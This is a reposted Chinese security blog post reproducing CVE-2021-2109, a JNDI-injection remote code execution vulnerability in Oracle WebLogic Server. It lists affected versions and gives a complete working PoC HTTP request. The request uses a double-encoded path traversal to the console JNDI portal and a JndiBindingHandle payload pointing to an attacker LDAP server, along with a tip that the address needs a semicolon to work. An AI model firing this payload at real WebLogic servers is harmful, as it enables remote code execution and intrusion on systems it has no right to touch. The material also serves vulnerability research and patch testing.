文章总结: 本文详细介绍了CVE-2021-2109WeblogicServer远程代码执行漏洞的复现过程,该漏洞由JNDI注入导致。文章列出了受影响的WeblogicServer版本,提供了完整的PoC代码,并特别指出LDAP地址使用分号而非冒号的关键细节。漏洞复现通过发送特定POST请求到/console/css/%252e%252e%252f/consolejndi.portal端点实现,攻击者可利用此漏洞执行任意代码。文章建议管理员尽快升级受影响版本或采取其他防护措施。
综合评分: 75
文章分类: 漏洞分析,WEB安全,渗透测试,漏洞预警
【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现
原创
SuPejkj
渗透Xiao白帽
2021年1月21日 13:46
0x01 前言
CVE-2021-2109,该漏洞为Weblogic的远程代码执行漏洞。漏洞主要由JNDI注入,导致攻击者可利用此漏洞远程代码执行。
0x02 影响版本
Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0
0x03 环境搭建
本次环境用的之前搭建的,不做过多介绍,详细搭建过程参考上一篇
【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
所用到的工具网上都有,也可后台回复”CVE-2021-2109“获取
0x04 漏洞复现
PoC:
POST /console/css/%252e%252e%252f/consolejndi.portal HTTP/1.1Host: 192.168.46.133:7001User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: ADMINCONSOLESESSION=2BYjPffl4uJEwegmeojCoLD4tJU-FOMPojHKs1usTlL-rS1iMAYD!-818656581Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 164
_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.46;133:1389/g9ey7l;AdminServer%22)
这有个小细节就是ldap地址是用分号,这个地方我就踩了个坑,没仔细看poc试了好几次才发现
0x05 参考链接
https://mp.weixin.qq.com/s/QNz75BZOXK8DqmoTAwbV9ghttps://twitter.com/jas502n/status/1352076921190850563/photo/1
【往期推荐】
【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】
【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
【奇淫巧技】如何成为一个合格的“FOFA”工程师
走过路过的大佬们留个关注再走呗
往期文章有彩蛋哦
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:渗透Xiao白帽 SuPejkj《【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现》